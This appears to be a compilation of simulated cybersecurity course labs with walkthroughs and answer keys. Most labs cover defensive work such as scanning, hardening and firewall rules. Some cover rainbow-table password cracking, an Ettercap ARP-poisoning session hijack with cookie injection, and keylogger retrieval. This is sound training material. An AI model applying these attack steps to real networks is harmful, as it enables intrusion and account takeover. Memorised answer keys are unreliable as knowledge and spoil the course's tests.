You are the security analyst for a small corporate network. Part of your role is to ensure secure access to the company website. You want to verify that the passwords being used meet the company's requirements. To do this, you captured some password hashes in a file named captured_hashes.txt and saved it in the /root directory. You want to use a rainbow table to analyze the passwords captured in this hash file to see if they meet the company's website requirements. The password requirements for your website are as follows: The password must be eight or more characters in length. The password must include at least one upper and one lowercase letter. The password must have at least one of these special characters: !, ", #, $, %, &, _, ', *, or @ All passwords are encrypted using an md5 or sha1 hash algorithm. In this lab, your task is to: Determine which rainbowcrack charset includes all the characters required for your company's website password requirements. Create md5 and sha1 rainbow tables using rtgen. Sort the rainbow tables using rtsort. Analyze the passwords using rcrack. Answer the questions.
1. Determine which rainbowcrack charset includes all the character required for your company's password requirements. a. From the Favorites bar, select Terminal. b. At the prompt, type cat /usr/share/rainbowcrack/charset.txt c. Press Enter. d. In the top right, select Answer Questions. e. Answer Question 1. 2. Create and sort an md5 and sha1 rainbow crack table. a. At the prompt, type rtgen md5 ascii-32-95 1 20 0 1000 1000 0 and press Enter to create a md5 rainbow crack table. b. Type rtgen sha1 ascii-32-95 1 20 0 1000 1000 0 and press Enter to create a sha1 rainbow crack table. c. Type rtsort . and press Enter to sort the rainbow table. 3. Analyze the passwords using rcrack. a. Type rcrack . -l /root/captured_hashes.txt and press Enter to crack the password contained in a hash file. b. Answer Questions 2-5. c. Select Score Lab.
You are the security analyst working for CorpNet. You are trying to see if you can discover weaknesses in your network. From outside of the CorpNet network, you found that the web server (www.corpnet.xyz) has an IP address of 198.28.1.1. To test for weaknesses, you decide to perform several nmap scans using a few http scripts. In this lab, your task is to run the following nmap scripts on port 80 of 198.28.1.1 and answer the applicable questions:
1. Display the HTTP server header. a. From the Favorites bar, select Terminal. b. At the prompt, type nmap --script=http-server-header -p80 198.28.1.1 and press Enter to run the script. c. From the top right, select Answer Questions. d. Answer Question 1. 2. Measure the time a website takes to deliver its web pages. a. Type nmap --script=http-chrono -p80 198.28.1.1 and press Enter to run script. b. Answer Question 2. 3. Perform a HEAD request for the root folder and crawl through the website to look for error pages. a. Type nmap --script=http-headers -p80 198.28.1.1 and press Enter to run the script. b. Type nmap --script=http-errors -p80 198.28.1.1 and press Enter to run the script. c. Under Lab Questions, answer Question 3. 4. Look for malware signatures of known server compromises a. Type nmap --script=http-malware-host -p80 198.28.1.1 and press Enter to run the script. b. Answer Question 4. 5. Display HTML and JavaScript comments. a. Type nmap --script=http-comments-displayer -p80 198.28.1.1 and press Enter to run the script. b. Answer Question 5. c. Select Score Lab. 1- Microsoft-IIS 10.0 2- 3.14ms 3- 3 4- No 5- <!--Google Analytics Code-->
You are the security analyst for a small corporate network. While working on your Linux server, you have determined that you need to enable and disable a few services. In this lab, your task is to: Use the systemctl command to enable anaconda.service. Use the systemctl command to disable vmtoolsd.service. After each command, check the service status with the systemctl is-enabled command.
1. Enable the Anaconda service. a. At the prompt, type systemctl enable anaconda.service and then press Enter. b. Type systemctl is-enabled anaconda.service and then press Enter to check the service's status. 2. Disable the VMware tools service. a. Type systemctl disable vmtoolsd.service and press Enter. b. Type systemctl is-enabled vmtoolsd.service and press Enter to check the service's status.
you are the security analyst for a small corporate network. You have had problems with users installing remote access services like Remote Desktop Services and VNC Server. You need to find, stop, and disable these services on all computers running them. In this lab, your task is to: Use Zenmap to run a scan on the 192.168.0.0/24 network to look for the following open ports:Port 3389 - Remote Desktop Services (TermServices)Port 5900 - VNC Server (vncserver)Answer Questions 1 and 2. Disable and stop the services for the open ports found running on the applicable computers.Use the following table to identify the computers:
1. For the computers that have a remote access service port open, disable and and then stop the applicable service from running. a. From the top navigation tabs, select Floor 1 Overview. b. Select the computer with the remote access service port open. OFFICE 2 AND ITADMIN c. In the search field on the taskbar, type Services. d. Under Best Match, select Services. e. Double-click the service (Remote Desktop Services or VNC Server) that needs to be stopped. OFFICE2: Remote Desktop Service disabled Remote Desktop Service stopped ITADMIN: VNC disabled VNC stopped f. Using the Startup Type drop-down, select Disabled. g. Under Service status, select Stop. h. Select OK. i. Repeat step 2a-2i. j. In the top right, select Answer Questions. k. Select Score Lab. ANSWERS: 1- 192.168.0.34 2- 192.168.0.31
You are the security analyst for a growing corporate network. You manage the certification authority for your network. As part of your daily routine, you perform several certificate management tasks. CorpCA, the certification authority, is a guest server on CorpServer2. Your network uses smart cards to control access to sensitive computers. Currently, the approval process dictates that you manually approve smart card certificate requests. In this lab, your task is to complete the following: Approve the pending certificate request for a smart card certificate from mlopez. Deny the pending web server certificate request for CorpSrv16. User bnguyen lost his smartcard. Revoke the certificate assigned to bnguyen.CorpNet.com using the Key Compromise reason code. User tsutton has left his company. Revoke the certificate assigned to tsutton.CorpNet.com using the Change of Affiliation reason code. Unrevoke the CorpDev2 certificate.
1. From CorpCA, access Certification Authority. a. From Hyper-V Manager, select CORPSERVER2. b. Maximize the window for easier viewing. c. From the Virtual Machines pane, double-click CorpCA. d. From Server Manager's menu bar, select Tools > Certification Authority. e. Maximize the window for easier viewing. f. From the left pane, expand CorpCA-CA. 2. Approve the pending smart card certificate request for mlopez. a. Select Pending Requests. b. From the right pane, scroll to the Request Common Name column. c. Right-click mlopez and select All Tasks > Issue to approve the certificate. 3. Deny the pending smart card certificate request for CorpSrv16. a. Right-click CorpSrv16.CorpNet.com and select All Tasks > Deny. b. Select Yes. 4. Revoke bnguyen's and tsutton's certificates. a. From the left pane, select Issued Certificates. b. From the right pane, right-click bnguyen.CorpNet.com and select All Tasks > Revoke Certificate. c. Using the Reason code drop-down, select Key Compromise. d. Select Yes. e. Right-click tsutton and select All Tasks > Revoke Certificate. f. Using the Reason code drop-down, select Change of Affiliation. g. Select Yes. 5. Unrevoke the CorpDev2 certificate. a. From the left pane, select Revoked Certificates. b. From the right pane, right-click CorpDev2.CorpNet.com and select All Tasks > Unrevoke Certificate.
Which type of processor chip is designed to perform a single function and is typically custom-designed?
ASIC
What does a router use to protect a network from attacks and to control which types of communications are allowed on a network?
Access control list
Listen to simulation instructions You are the security analyst for a small corporate network. You have heard complaints that the CorpServer (192.168.0.10) seems to be very unresponsive. You suspect the server may be under a SYN attack. In this lab, your task is to: Use Zenmap to find which ports on CorpServer (192.168.0.10) are open. Use Wireshark and the enp2s0 network interface to determine if the CorpServer is under a SYN attack. Analyze the packets captured. Answer the questions.
1. From Zenmap, use nmap to find the open ports used on CorpServer. a. From the Favorites bar, select Zenmap. b. In the Command field, type nmap -p 0-100 192.168.0.10 c. Select Scan. d. In the top right, select Answer Questions. e. Answer Question 1. f. Minimize the Lab Question dialog. g. Close Zenmap. 2. Capture SYN packets on the CorpServer machine. a. From the Favorites bar, select Wireshark. b. Under Capture, select enp2s0. c. In the Apply a display filter field, type host 192.168.0.10 and tcp.flags.syn==1 d. Press Enter. e. Select the blue fin to begin a Wireshark capture. f. Capture packets for a few seconds. g. From Wireshark, select the red box to stop the Wireshark capture. 1- 5 2- All syn packets have the same source IP address., The time between syn packets is very short. 3- 21, 22, 23, 25 4- 00:60:98:7f:41:e0
You work as a security analyst for a small corporation. Your manager has asked you to check the external servers of a potential partner's company for potentially vulnerable ports. The company hosts an external web server at www.partnercorp.xyz. In this lab, your task is to perform reconnaissance on the PartnerCorp external servers to find potentially vulnerable ports as follows: On Analyst-Lap Use the whois.org website to determine the domain name servers used by PartnerCorp.xyz.Answer question 1. Use nslookup to determine the primary web server address.Answer question 2. On Analyst-Lap2 Use Zenmap to search for 50 of the top ports opened on the network identified by nslookup above.Answer question 3.
1. From the Analyst-Lap computer, find the domain name servers used by partnercorp.xyz. a. From the taskbar, select Google Chrome. b. Maximize the the windows for better viewing. c. In the URL field, type whois.org and press Enter. d. In the Search for a domain name field, enter partnercorp.xyz. e. Select Search. f. In the top right, select Answer Questions. g. Answer Question 1. 2. Use Zenmap to run an Nmap command to scan for open ports. a. From the navigation tabs, select Buildings. b. Under Blue Cell, select Analyst-Lap2. c. From the Favorites bar, select Zenmap. d. Maximize Zenmap for easier viewing. e. In the Command field, use nmap --top-ports 50 73.44.215.0/24 to scan for open ports. f. Select Scan to scan for open ports on all servers located on this network. g. In the top right, select Answer Questions. h. Answer Question 3. i. Select Score Lab. ANSWERS: 1- ns1.nethost.net 2- 73.44.215.1 3- 73.44.215.5
You are the security analyst for a small corporate network. You suspects that one of the computers in your company is connecting to a rogue access point (AP). You need to find the name of the hidden rogue AP so it can be deauthorized. The computer suspected of using the rogue access point is Gst-Lap. In this lab, your task is to complete the following: On IT-Laptop, use airmon-ng to put the wireless adapter in monitor mode. Use airodump-ng to find the hidden access point. Answer the question. From the Gst-Lap computer, connect to the rogue AP using the SSID of BookStore.
1. From the IT-Laptop, configure the wlp1s0 card to run in monitor mode. a. From the Favorites bar, select Terminal. b. At the prompt, type airmon-ng and press Enter to find the name of the wireless adapter. c. Type airmon-ng start wlp1s0 and press Enter to put the adapter in monitor mode. d. Type airmon-ng and press Enter to view the new name of the wireless adapter. 2. Use airodump-ng to discover and isolate the hidden access point. a. Type airodump-ng wlp1s0mon and press Enter to discover all of the access points. b. Press Ctrl + c to stop airodump-ng. c. Find the hidden access point ESSID. d. In the top right, select Answer Questions. e. Answer the question. f. In Terminal, type airodump-ng wlp1s0mon --bssid 00:00:1B:45:21:11 and press Enter to isolate the hidden access point. 3. Switch to the Gst-Lap and connect to the Wi-Fi network. a. From the top navigation tabs, select Floor 1 Overview. b. Under Executive Office, select Gst-Lap. c. From the notification area, select the Wi-Fi network icon. d. Select Hidden Network. e. Select Connect. f. In the Enter the name (SSID) for the network field, type BookStore. In a real environment, you'll only need to wait until the employee connects to the rogue access point again. g. Select Next. h. Select Yes.Wait for the connection to be made. i. Under Lab Questions, select Score Lab. 1- 00:00:1b:45:21:11
You are the security analyst for a small corporate network. You are concerned that your company's employee portal has a weak configuration that could web sessions to be hijacked. To verify whether the authentication to this portal can be broken, you have decided to see if you can hijack a web session to the employee portal. In this lab, your task is to attempt to hijack a web session as follows: On IT-Laptop:Use the terminal to find the IP addresses for Office1 and the default gateway.Use Ettercap to sniff traffic (unified) between Office1 and the gateway using the enp2s0 interface. Initiate a man-in-the-middle (on-path) attack to capture the session ID for the employee portal logon. On Office1, use Google Chrome to log in to the employee portal using the following information:Site: rmksupplies.comUsername: sramirezPassword: mickeyminniegoofypluto On IT-Laptop, copy the session cookie detected in Ettercap. On Office2, use Google Chrome to access rmksupllies.com. Use the Google Chrome cookie editor plug-in to inject the session ID cookie copied. Test to see if you can hijack the session.
1. Get the IP address and route for Office1. a. From the Favorites bar, select Terminal. b. At the prompt, type host office1 and press Enter to get the IP address of Office1. c. Type route and press Enter to get the gateway address. 2. Use Ettercap to sniff traffic between Office1 and the gateway. a. From the Favorites bar, select Ettercap. b. From the Ettercap menu, select Sniff > Unified sniffing. c. From the Network Interface drop-down list, select enp2s0. d. Select OK. e. Select Hosts > Scan for hosts. f. Select Hosts > Host list to display a list of the hosts found. g. Under IP Address, select the gateway's IP address and then select Add to Target 1. 192.168.0.5 h. Select Office1's IP address and then select Add to Target 2. 192.168.0.33 3. Initiate a man-in-the-middle (on-path) attack. a. Select Mitm > ARP poisoning. b. Select Sniff remote connections and then select OK.You are ready to capture traffic. 4. From Office1, log in to the employee portal on rmksupplies.com. a. From the top navigation tabs, select Floor 1 Overview. b. Under Office 1, select Office1. c. From the taskbar, select Google Chrome. d. Maximize the window for easier viewing. e. In the URL field, enter rmksupplies.com and then press Enter. f. Scroll to the bottom of the page and then select Employee Portal. g. In the Username field, enter sramirez. h. In the Password field, enter mickeyminniegoofypluto. i. Select Login.You are logged into the employee portal as Sophia Ramirez. 5. From the IT-Laptop computer, copy the session ID detected in Ettercap. a. From the top navigation tabs, select Floor 1 Overview. b. Under IT Administration, select IT-Laptop. c. In the bottom pane of the Ettercap console, find sramirez's username, password, and session cookie (.login) captured in Ettercap. d. Highlight the session cookie ID (just the number). e. Press Ctrl + C to copy. 6. On Office2, go to rmksupplies.com and use the cookie editor plug-in to inject the session ID cookie. a. From the top navigation tabs, select Floor 1 Overview. b. Under Office 2, select Office2. c. From the taskbar, select Google Chrome. d. Maximize the window for easier viewing. e. In Chrome's URL field, enter rmksupplies.com. Do not copy the above address from the scenario. If you do, you will lose the captured session ID. f. Press Enter. g. In the top right corner, select the cookie icon to open the cookie editor. h. From the menu bar, select the plus + sign to add a new session cookie. i. In the Name field, enter .login j. In the Value field, press Ctrl + V to paste in the session cookie you copied from Ettercap. k. Make sure rmksupplies.com is in the Domain field. l. Select the green check mark to save the cookie. m. Click outside the cookie editor to close the editor. 7. At the bottom of the rkmsupplies page, select Employee Portal.You are now on Sophia Ramirez's web session without being asked for a username or password.
You are a cybersecurity consultant for a small corporate office. The employee in Office1 is suspected of using their work computer in some sort of criminal operation. You have made an image of the hard drive on that computer and you would like to use Autopsy to analyze the contents of the hard drive. In this lab, your task is to analyze an Office1 disk image with Autopsy by doing the following: Create a case file.Case Name: corpnet-case132 (no spaces)Base Directory: d:\autopsyCase Number: 132Examiner: enter your name, number, and email Import the disk image.Disk image file: e:\office1_hd.vhdIngest Modules: Recent Activity, Hash Lookup, File Type Identification, EXIF Parser, and Keyword Search Analyze the disk image.Under Data Sources, analyze the Users folder on vol2.Answer Question 1.Under Views, analyze the File Types and the File Size.Answer Questions 2 and 3.Under Results, analyze the Extracted Content and the Keyword Hits.Answer Questions 4-6.
1. In Autopsy, create a case file. a. Select Start and then select Autopsy. b. From the Welcome dialog, select New Case. c. In the Case Name field, enter corpnet-case132 (no spaces). d. Select Browse and then from the left pane, expand and select Forensic (D) > autopsy as the Base Directory. e. Select Folder. f. Select Next. g. Under Case, enter the number 132. h. Under Examiner, enter your name, phone number, and email address. i. Select Finish. 2. Import the disk image. a. Under Select Type of Data Source to Add, make sure Disk Image or VM File is checked and then select Next. b. For Path, select Browse and then expand and select Data (E:). c. From the right pane, select office1_hd.vhd as the disk image file and then select Open. d. Select Next. e. Under Configure Ingest Modules, select Deselect All. f. Select: § Recent Activity § Hash Lookup § File Type Identification § EXIF Parser § Keyword Search g. Select Next. h. Select Finish and wait for the disk to finish analyzing. 1- David 2- Dognapping 3- Dogs 4- dogwonder.com, dog-pharmacy.com, dogclaw-db.com 5- [email protected] 6- Rover.com, DogGoneIt.com
You are the security analyst for a small corporate network. To protect your Bluetooth devices from attacks, you want to discover which Bluetooth devices are running in your company and gather information about each of them. In this lab, your task is to use the Terminal to: Use hciconfig to discover and enable the onboard Bluetooth adapter. Use hcitool to find all of the Bluetooth devices. Answer Question 1. Use l2ping to determine if the Bluetooth device is alive and within range. Answer Question 2. Use sdptool to query Francisco's laptop to determine the Bluetooth services available on the device. Answer Question 3. Use hcitool to determine the clock offset and class for Brian's Braven Speaker device. Answer Question 4.
1. Initialize the Bluetooth adapter. a. From the Favorites bar, select Terminal. b. At the prompt, type hciconfig and press Enter to view the onboard Bluetooth adapter. c. Type hciconfig hci0 up and press Enter to initialize the adapter. d. Type hciconfig and press Enter to verify that the adapter is up and running. 2. Find all Bluetooth devices within range. a. Type hcitool scan and press Enter to view the detected Bluetooth devices and their MAC addresses. b. In the top left, select Answer Questions. c. Answer Question 1. 3. Determine if the Bluetooth devices found are in range. a. Type l2ping MAC_address and press Enter to determine if the Bluetooth device is in range. b. Press Ctrl + c to stop the ping process. 4. Find details for Francisco's laptop using sdptool. a. Type sdptool browse AF:52:23:92:EF:AF and press Enter to view the details for Francisco's laptop. b. Answer Question 3. 5. Find details for Brian's Echo Show using hcitool. a. Type hcitool inq and press Enter to determine the clock offset and class for each device. b. Answer Question 4. c. Select Score Lab. 1- 6 2- 6 3- Ad Hoc User Service, Device ID Service Record 4- 0x248080
Based on your review of physical security, you have recommended several improvements. Your plan includes smart card readers, IP cameras, signs, and access logs. Implement your physical security plan by dragging the correct items from the shelf into the various locations in the building. As you drag the items from the shelf, the possible drop locations are highlighted. In this lab, your task is to: Install the smart card key readers in the appropriate locations to control access to key infrastructure. Install the IP security cameras in the appropriate locations to record which employees access the key infrastructure. Install a Restricted Access sign in the appropriate location to control access to the key infrastructure. Add the visitor log to a location appropriate for logging visitor access.
1. Install the smart card key readers. a. From the Shelf, expand Door Locks. b. Drag a Smart Card Reader from the shelf to the highlighted location outside the building's front door. c. Drag a Smart Card Reader from the shelf to the highlighted location outside the Networking Closet's door. 2. Install the IP security cameras. a. From the Shelf, expand CCTV Cameras. b. Drag the IP Security Camera from the shelf to the highlighted circle inside the Networking Closet. c. Drag the IP Security Camera from the shelf to just outside the Networking Closet. 3. Install the Restricted Access sign. a. From the Shelf, expand Restricted Access Signs. b. Drag the Restricted Access Sign from the shelf to the Networking Closet door. 4. Install the visitor log. a. On the Shelf, expand Visitor Logs. b. Drag the Visitor Log from the shelf to the Lobby desk.
You are the security analyst for the CorpNet.xyz company. A senior IT network administrator, Oliver Lennon, is suspected of wrongdoing and thinks he is in danger of being fired from the company. To help hide his actions, Oliver has changed many standard passwords that are only known to the top executives, and now he is the only person that knows these passwords. To protect the company from being locked out in the event of Oliver's dismissal, another top executive has allowed you to install a keylogger device on the ITAdmin computer, which Oliver uses. You hope you can use this method to capture the changed passwords. It has been a week since the keylogger device was installed, and the company executive has let you back into the IT Admin's office after hours. In this lab, your task is to: Move the keylogger to your laptop without inhibiting the functionality of the ITAdmin computer. From your laptop, use the SBK key combination to toggle the USB keylogger from keylogger mode to USB flash drive mode. Using the LOG.txt file created by the keylogger, inspect the contents. Answer the questions.
1. Move the keylogger from the ITAdmin computer to a USB port on the Analyst-Lap laptop. a. From the Workspace, above the computer, select Back. b. On the back of the computer, drag the USB Type A connector for the keyboard/keylogger to another USB port on the computer.This gives you access to the keylogger. c. From the Shelf, expand System Cases. d. Drag the laptop to the Workspace. e. Above the laptop, select Back. f. From the computer, drag the keylogger to a USB port on the laptop. 1- P@ssw0rd 2- 4Lm87Qde
You are the security analyst for a small corporate network. The receptionist, Maggie Brown, uses an iPad to manage employee schedules and messages. You need to help her make the iPad more secure. The current simple passcode for her iPad is 3141. In this lab, your task is to: Set a secure passcode on the iPad as follows:Require a passcode: After 5 minutesNew passcode: youwontguessthisone Turn simple passcodes off. Configure the iPad to erase data after 10 failed passcode attempts.
1. On the iPad, set Require Passcode for 5 minutes. a. Select Settings. b. From the left menu, select Touch ID & Passcode. c. Enter 3141 for the passcode. d. From the right pane, select Require Passcode e. Select After 5 minutes. 2. Turn off simple passcodes. a. At the top, select Passcode Lock. b. Next to Simple Passcode, slide the switch to turn off simple passcodes. c. Enter 3141 for the passcode. d. Enter youwontguessthisone as the new passcode and then select Next. e. Enter youwontguessthisone to re-enter the new passcode and then select Done. 3. Configure the iPad to erase data after 10 failed passcode attempts. a. From the Touch ID & Passcode page, next to Erase Data, slide the switch to enable Erase Data. b. Select Enable.
You are the security analyst for your company. Your manager is concerned about the vulnerability of the company's database server which contains the finance and accounting systems. He wants you to perform a port scan on the server (192.168.0.22)to identify all the open ports. In this lab, your task is to: Use nmap to perform a port scan on the database server to determine if any ports are open. Answer the question.
1. Scan the company's database server for open ports. a. From the Favorites bar, select Terminal. b. At the prompt, type nmap -p- 192.168.0.22. c. Press Enter. 2. Answer the question. a. In the top right, select Answer Questions. b. Answer the question. c. Select Score Lab. Answer 4
An attacker has made their way into an organization's network and run an LDAP enumeration tool. What is the attacker MOST likely accessing and extracting information from?
Active Directory
Which cybersecurity approach seeks to asymmetrically put the odds in the security analyst's favor by using maneuverability of sensitive data, honeypots, and anti-malware programs?
Active defense approach
Listen to simulation instructions You are the Security Analyst for a small corporate network. The company has a single Active Directory domain named CorpNet.xyz. You need to increase the domain's authentication security. You need to make sure that User Account Control (UAC) settings are consistent throughout the domain and in accordance with industry recommendations. In this lab, your task is to configure the following UAC settings in the Default Domain Policy on CorpDC:
1. Open Group Policy Management on CorpDC. a. From Hyper-V Manager, select CORPSERVER. b. Double-click CorpDC to open the virtual machine. c. From Server Manager, select Tools > Group Policy Management. d. Maximize the window for better viewing. 2. Open the Default Domain Policy for editing. a. Expand Forest: CorpNet.local > Domains > CorpNet.local. b. Right-click Default Domain Policy and select Edit. c. Maximize the window for easier viewing. 3. In Security Options, edit the User Account Control policies . a. Under Computer Configuration, expand Policies. b. Expand Windows Settings > Security Settings > Local Policies. c. Select Security Options. d. In the right pane, right-click the policy you want to edit and select Properties. e. Select Define this policy setting. f. Select Enable or Disable as necessary. g. Edit the value for the policy as needed and then select OK. h. Repeat steps 3d-3g for each policy setting.
You are the security analyst for a small corporate network. To ensure that your Linux computers meet the current company security standards, you have decided to conduct a vulnerability scan. In this lab, your task is to complete the following: From the ITAdmin computer, use the Security Evaluator to check the security:On the Linux computer with the IP address of 192.168.0.22On the Linux computers in the IP address range of 192.168.0.60 through 192.168.0.69 Answer the questions.
1. Run a Security Evaluator report for 192.168.0.22 a. From the taskbar, select Security Evaluator. b. Next to Local Machine, select the target icon to select a new target. c. Select IPv4 Address. d. Enter 192.168.0.22 e. Select OK. f. Next to Status, select the Run/Rerun Security Evaluation icon to run the security evaluation. g. Review the results. h. In the top right, select Answer Questions. i. Answer Question 1. 2. Run a Security Evaluator report for the IP address range of 192.168.0.60 through 192.168.0.69 a. From the Security Evaluator, select the target icon to select a new target. b. Select IPv4 Range. c. In the left field, type 192.168.0.60 d. In the right field, type 192.168.0.69 e. Select OK. f. Next to Status, select the Status Run/Rerun Security Evaluation icon to run the security evaluation. g. Review the results. h. Answer Questions 2 and 3. i. Select Score Lab. 1- root - Password Does Not Expire 2- 192.168.0.65, 192.168.0.68 3- backup - Password Does Not Expire
you are the security analyst for a small corporate network. You are concerned that there are some IoT devices on the corporate network that may not be in compliance with the current security standards. You have decided to use the Security Evaluator help you determine whether there are any IoT devices on your network and whether they have issues that need attention. In this lab, your task is to: Scan all devices using an IP address in the range of 192.168.200.50 through 192.168.200.100. Answer the questions.
1. Run a Security Evaluator report for 192.168.200.50 through 192.168.200100. a. From the taskbar, select Security Evaluator. b. From the Security Evaluator, select the Target icon to select a new target. c. Select IPv4 Range. d. In the left field, type 192.168.200.50 as the beginning IP address. e. In the right field, type 192.168.200.100 as the ending IP address. f. Select OK. g. Next to Status, select the Run/Rerun Security Evaluation icon to run a security evaluation. h. Answer Questions. i. Select Score Lab. 1- Wireless Thermostat 2- Video Conference System 3- 192.168.200.54, 192.168.200.66
You are the security analyst for a small corporate network. You have decided to check to see if the computer used by the primary administrator, Ava, meets the current security policies. Ava is the only person authorized to perform local administrative actions. The company network security policy requires that Windows Firewall be enabled on all workstations and that complex passwords are used for all users. Sharing personal files is not allowed. The requirements for a complex password are 12 characters or more and 3 of the following:At least one uppercase letterAt least one lowercase letterAt least one numberA special character that isn't a number, letter, or whitespace In this lab, your task is to complete the following: On ITAdmin, use the Security Evaluator (found on the taskbar) to run a vulnerability scan. On Office2, remediate all vulnerabilities that didn't pass as shown in the vulnerability report. On ITAdmin, re-run a vulnerability scan to make sure all of the issues are resolved.
1. Run a Security Evaluator report. a. From the taskbar, select Security Evaluator. b. Next to Local Machine, select the Target icon to select a new target. c. Select Workstation. d. Using the Workstation drop-down menu, select Office2 as the target. e. Select OK. f. Next to Status, select the Run/Rerun Security Evaluation icon to run the security evaluation. g. Review the results to determine which issues you need to resolve on Office2. 2. Access Computer Management from the Office2 computer. a. From the top navigation tabs, select Floor 1. b. Under Office2, select Office2. c. From Office2, right-click Start and select Computer Management. 3. Rename the Administrator user account. a. Expand Local Users and Groups. b. Select Users. c. Right-click Administrator and select Rename. d. Enter a new name of your choice and press Enter. 4. Unlock Charlotte's account and remove her from the Administrators group. a. Right-click Charlotte and select Properties. b. Deselect Account is locked out and then click Apply. c. Select the Member of tab. d. Select Administrators. e. Select Remove. f. Select OK. 5. Disable the Guest account. a. Right-click Guest and select Properties. b. Select Account is disabled and then select OK. 6. Set a new password for Ava. a. Right-click Ava and select Set Password. b. Select Proceed. c. Enter a new password of your choice. It must contain: § 12 characters or more. § At least one upper and one lowercase letter. § At least one number. d. Confirm the new password and then select OK. e. Select OK to close the confirmation dialog. Ideally, you should have created a policy that requires passwords with 12 characters or more. 7. Configure Ava's password to expire and to change her password at the next logon. a. Right-click Ava and select Properties. b. Deselect Password never expires. c. Select User must change password at next logon and then select OK. d. Close the Computer Management window. 8. Enable Windows Firewall for all profiles. a. Right-click Start and then select Settings. b. Select Network & Internet. c. From the right pane, scroll down and select Windows Firewall. d. Under Domain network, select Turn on. e. Under Private network, select Turn on. f. Under Public network, select Turn on. g. Close the Windows Security and Settings windows. 9. Remove the file share from the MyMovies folder. a. From the taskbar, select File Explorer. b. Browse to C:\MyMovies. c. Right-click MyMovies and select Properties. d. Select the Sharing tab. e. Select Advanced Sharing. f. Deselect Share this folder. g. Select OK to close the Advanced Sharing window. h. Select OK to close the MyMovies Properties window. 10. Use the Security Evaluator feature to verify that all of the issues on the Office2 computer were resolved. a. From the top navigation tabs, select Floor 1. b. Select ITAdmin. c. In Security Evaluator, select Status refresh to re-run the security evaluation. d. If you still see unresolved issues, select Floor 1, navigate to the Office2 workstation and remediate any remaining issues.
You are the security analyst for a small corporate network. You are concerned that hackers may be performing port scanning on the network, hoping to find open ports that could leave the company vulnerable to attacks. In this lab, your task is to use Nmap to detect open ports as follows: Scan the computers in Bldg A using 192.168.0.0/24 for the network address Scan the computers in Bldg B using 192.168.10.0/24 for the network address. Scan the company's public facing web servers using 198.28.1.0/24 for the network address Answer the questions.
1. Scan for open ports on 192.168.0.0, 192.168.10.0 and 198.28.1.0. a. From the Favorites bar, select Terminal. b. At the prompt, type nmap -p- 192.168.0.0/24 and press Enter. c. Type nmap -p- 192.168.10.0/24 and press Enter. d. Type nmap -p- 198.28.1.0/24 and press Enter. 2. Answer the questions. a. In the top right, select Answer Questions. b. Answer the questions. c. Select Score Lab. 1- Domain Controller, DNS 2- 198.28.1.1, 198.28.1.2, 198.28.1.3, 198.28.1.15 3- 198.28.1.15
You are the security analyst for a small corporate network. You want to ensure that your local network is free from potential vulnerabilities. You have decided to get a list of the operating systems running on your network and to see if any folders are shared. In this lab, your task is to complete the following: From the IT-Laptop, use Zenmap to determine the operating system of the hosts on your network.The network address is: 192.168.0.0/24Answer Question 1. From ITAdmin and Windows PowerShell (Admin):Use net view to check for shared folders on the CorpFiles and CorpFiles16 servers.Map the H: drive to the shared folder found on CorpFiles.View the files in the shared folder on the CorpFiles server. Answer Question 2.
1. Scan for operating systems on the network. a. From the Favorites bar, select Zenmap. b. In the Command field, type nmap -O 192.168.0.0/24. c. Select Scan to scan the local subnet. 2. 16View the shared folders on CorpFiles and CorpFiles16. a. From top navigation tabs, select Floor 1 Overview. b. Under IT Administration, select ITAdmin. c. Right-click Start and select Windows PowerShell (Admin). d. At the prompt, type net view corpfiles and press Enter. e. Type net view corpfiles16 and press Enter. 3. Map the H: drive to the Confidential folder on CorpFiles. a. Type net use h: \\corpfiles\finances and press Enter. b. Type h: and press Enter to change to the H: drive. 4. View the files in the Financial Records folder. a. Type dir and press Enter to view the folders available on the drive. b. Type cd Financial Records and press Enter. c. Type dir and press Enter to view the financial records. d. Answer Question 2. e. Select Score Lab. 1- 192.168.0.22, 192.168.0.46, 192.168.0.47, 192.168.0.48 2- Bank Accounts.xlsx
You are the security analyst for a small corporate network. To be more proactive in your defense against possible attacks, you want to save the system logs being captured by the pfSense firewall. In this lab, your task is to: Sign in to pfSense using:Username: adminPassword: P@ssw0rd (zero) Configure the general system logs to:Only show 25 logs at a time.Have a maximum log file size of 250,000 bytes. Enable and configure remote system logging using the following instructions:Save the log files on CorpSever (192.168.0.10).Only forward system and firewall events. Answer the questions.
1. Sign in to the pfSense Management console. a. In the Username field, enter admin. b. In the Password field, enter P@ssw0rd (zero). c. Select SIGN IN or press Enter. 2. Access the system log settings. a. From the pfSense menu bar, select Status > System Logs. b. In the top right, select Answer Questions. c. Answer Question 1. 3. Configure the general logging options. a. Under the Status breadcrumb, select Settings. b. Set the GUI Log Entries field to 25 to show only 25 logs at a time in the GUI. c. Set the Log file size field to 250000 byes (250 KB) to set the maximum size of each log file. 4. Configure remote logging. a. Scroll to the bottom and, under Remote Logging Options, select Enable Remote Logging. b. Make sure the options are set as follows: § Source address: Default (any) § IP protocol: IPv4 § Remote log servers: 192.168.0.10 c. For Remote Syslog Contents, select the following: § System Events § Firewall Events d. Select Save. 5. View the results of the changes made to the number of logs shown. a. Under the Status breadcrumb, select System. b. Answer Question 2. c. Select Score Lab. 1- 50 2- 25
You work as the IT security administrator for a small corporate network. You recently placed a web server in the demilitarized zone (DMZ). You need to configure the perimeter firewall on the network security appliance (pfSense) to allow access from the WAN to the Web server in the DMZ using both HTTP and HTTPs. You also want to allow all traffic from the LAN network to the DMZ network. In this lab, your task is to: Access the pfSense management console:Username: adminPassword: P@ssw0rd (zero) Create and configure a firewall rule to pass HTTP traffic from the WAN to the Web server in the DMZ. Create and configure a firewall rule to pass HTTPS traffic from the WAN to the Web server in the DMZ.Use the following table when creating the HTTP and HTTPS firewall rules:ParameterSettingSourceWAN networkDestination port/serviceHTTP (80), HTTPS (443)DestinationA single hostIP address for host172.16.1.5DescriptionsFor HTTP: HTTP from WAN to DMZFor HTTPS: HTTPS from WAN to DMZ Create and configure a firewall rule to pass all traffic from the LAN network to the DMZ network. Use the description LAN to DMZ Any.
